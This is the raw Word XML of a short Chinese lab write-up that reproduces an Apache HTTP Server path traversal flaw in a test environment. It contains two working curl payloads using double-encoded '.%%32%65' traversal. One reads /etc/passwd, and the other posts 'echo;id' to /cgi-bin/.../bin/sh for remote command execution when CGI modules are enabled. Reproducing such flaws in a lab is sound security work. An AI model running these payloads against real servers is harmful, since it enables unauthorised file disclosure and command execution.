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88" w:rsidRPr="00521633" w:rsidRDefault="00521633">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00521633">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>一、靶场搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521633" w:rsidRDefault="00521633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521633" w:rsidRDefault="00521633">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00521633">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="131633"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="2" name="图片 2" descr="C:\Users\Toby\AppData\Local\Temp\165355018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550183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633" w:rsidRDefault="00521633"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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521633" w:rsidRDefault="00521633">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D5403ED" wp14:editId="73F4E67F">
            <wp:extent cx="5274310" cy="920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33" w:rsidRDefault="00521633">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00521633" w:rsidRPr="00521633" w:rsidRDefault="00521633">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00521633">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521633" w:rsidRDefault="00521633">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、使用c</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送代码（其中/</w:t>
      </w:r>
      <w:r>
        <w:t>icons/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须是一个存在且可访问的目录）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521633" w:rsidRDefault="00521633">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5252357" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="24765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3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633" w:rsidRDefault="00521633">
                            <w:r w:rsidRPr="00521633">
                              <w:t>curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd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3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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00521633" w:rsidRDefault="00521633">
                      <w:r w:rsidRPr="00521633">
                        <w:t>curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd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21633" w:rsidRDefault="00521633">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="237BCC58" wp14:editId="10E1AE28">
            <wp:extent cx="5274310" cy="3236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33" w:rsidRDefault="00521633">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、如果服务器开启了c</w:t>
      </w:r>
      <w:r>
        <w:t>gi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或c</w:t>
      </w:r>
      <w:r>
        <w:t>gid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这两个m</w:t>
      </w:r>
      <w:r>
        <w:t>od</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况下，这个路径穿越漏洞将可以执行任意命令</w:t>
      </w:r>
      <w:r w:rsidR="00E16858">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如下成功响应</w:t>
      </w:r>
      <w:r w:rsidR="00E16858">
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidR="00E16858">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00521633" w:rsidRDefault="00521633">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5268686" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="27305" b="1778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868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633" w:rsidRDefault="00521633">
                            <w:r w:rsidRPr="00521633">
                              <w:t>curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'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4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">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w:rsidR="00521633" w:rsidRDefault="00521633">
                      <w:r w:rsidRPr="00521633">
                        <w:t>curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'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21633" w:rsidRDefault="005216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A246BC" wp14:editId="14940C32">
            <wp:extent cx="5274310" cy="2351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998" w:rsidRDefault="00B34998" w:rsidP="00521633">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B34998" w:rsidRDefault="00B34998" w:rsidP="0052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998" w:rsidRDefault="00B34998" w:rsidP="00521633">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00B34998" w:rsidRDefault="00B34998" w:rsidP="00521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4D"/>
    <w:rsid w:val="0039004D"/>
    <w:rsid w:val="00521633"/>
    <w:rsid w:val="00B34998"/>
    <w:rsid w:val="00E16858"/>
    <w:rsid w:val="00F4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C769D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AD2A3F5B-B289-4D6A-AAEF-5B4E86B4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16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1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16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2022-05-26T07:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-26T07:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>